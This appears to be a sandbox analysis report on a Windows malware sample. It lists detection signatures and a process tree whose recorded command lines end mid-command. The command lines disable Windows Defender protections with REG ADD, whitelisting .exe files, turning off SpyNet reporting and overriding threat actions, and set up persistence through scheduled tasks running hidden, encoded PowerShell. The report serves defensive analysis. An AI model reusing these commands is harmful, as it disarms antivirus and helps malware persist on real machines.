Windows
Analysis Report
file.exe
Overview
General Information
Detection
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Sigma detected: Schedule system process
Multi AV Scanner detection for dropped file
Uses cmd line tools excessively to alter registry or file data
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Modifies Group Policy settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found
Creates job files (autostart)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Classification
- System is w10x64
- file.exe (PID: 5820 cmdline: C:\Users\user\Desktop\file.exe MD5: 2D9B13584AB871C81FF24C473468CFFA)
  - Install.exe (PID: 5784 cmdline: .\Install.exe MD5: 3ADC95B09B9644E908114624326E8D0B)
  - Install.exe (PID: 5796 cmdline: .\Install.exe /S /site_id "525403" MD5: 6F52A47480DAE7C97A64DD5AEBB8E426)
  - forfiles.exe (PID: 5888 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32& REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64 & MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
  - conhost.exe (PID: 5872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  - cmd.exe (PID: 5960 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32& REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
  - reg.exe (PID: 5140 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
  - reg.exe (PID: 4496 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
  - forfiles.exe (PID: 5868 cmdline: C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32& REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64 & MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8)
  - conhost.exe (PID: 5600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  - cmd.exe (PID: 4544 cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32& REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D)
  - reg.exe (PID: 4668 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2)
  - reg.exe (PID: 1332 cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2)
  - schtasks.exe (PID: 1252 cmdline: schtasks /CREATE /TN "gUpzuvmWb" /SC once /ST 15:28:53 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" MD5: 15FF7D8324231381BAD48A052F85DF04)
  - conhost.exe (PID: 1364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  - schtasks.exe (PID: 1244 cmdline: schtasks /run /I /tn "gUpzuvmWb" MD5: 15FF7D8324231381BAD48A052F85DF04)
  - conhost.exe (PID: 4136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  - schtasks.exe (PID: 5956 cmdline: schtasks /DELETE /F /TN "gUpzuvmWb" MD5: 15FF7D8324231381BAD48A052F85DF04)
  - conhost.exe (PID: 5924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  - schtasks.exe (PID: 5176 cmdline: schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 17:15:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe\" d8 /site_id 525403 /S" /V1 /F MD5: 15FF7D8324231381BAD48A052F85DF04)
  - conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

- powershell.exe (PID: 4744 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
  - conhost.exe (PID: 5948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  - gpupdate.exe (PID: 1348 cmdline: "C:\Windows\system32\gpupdate.exe" /force MD5: 47C68FE26B0188CDD80F744F7405FF26)
  - conhost.exe (PID: 1544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

- fdKxpPd.exe (PID: 5880 cmdline: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\fdKxpPd.exe d8 /site_id 525403 /S MD5: 6F52A47480DAE7C97A64DD5AEBB8E426)
  - powershell.exe (PID: 5976 cmdline: powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Pol